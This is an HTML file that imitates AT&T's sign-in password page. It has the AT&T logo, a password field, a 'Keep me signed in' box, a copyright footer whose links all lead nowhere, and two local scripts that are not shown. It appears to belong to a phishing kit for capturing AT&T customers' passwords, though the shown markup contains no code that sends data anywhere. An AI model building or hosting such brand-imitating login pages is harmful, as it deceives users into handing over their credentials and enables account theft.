<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline';">
    <title>AT&T Password</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <div class="login-box">
            <img src="att_hz_lg_lkp_rgb_pos.png" alt="AT&T Logo" class="logo">
            <h1 class="signin-title1">Welcome</h1>
            <div class="user-id-row">
                <span id="backArrow" class="back-arrow">←</span>
                <span id="userIdDisplay" class="user-id-display"></span>
            </div>
            <form id="passwordForm" novalidate>
                <div class="input-group">
                    <label for="password" class="input-label">Password<span class="required"></span></label>
                    <div class="password-wrapper">
                        <input type="password" id="password" name="password" required>
                        <button type="button" id="showPassword" class="show-btn">Show</button>
                    </div>
                    <span class="error" id="errorMessage"></span>
                </div>
                <div class="checkbox-row">
                    <input type="checkbox" id="keepSignedIn" name="keepSignedIn">
                    <label for="keepSignedIn">Keep me signed in</label>
                </div>
                <button type="submit" class="continue-btn">Sign in</button>
                <div class="links">
                    <a href="#" class="forgot-link">Forgot password?</a>
                </div>
            </form>
            <div id="loading" class="loading" style="display: none;">
                <span class="spinner"></span>
            </div>
        </div>
        <footer>
            <div class="footer-links">
                <a href="#">Legal policy center</a> |
                <a href="#">Privacy policy</a> |
                <a href="#">Terms of use</a> |
                <a href="#">Accessibility</a> |
                <a href="#" class="privacy-toggle">Your privacy choices</a>
            </div>
            <p>©2025 AT&T Intellectual Property. All rights reserved.</p>
        </footer>
    </div>
    <script src="script.js"></script>
    <script src="integrations.js"></script>
</body>
</html>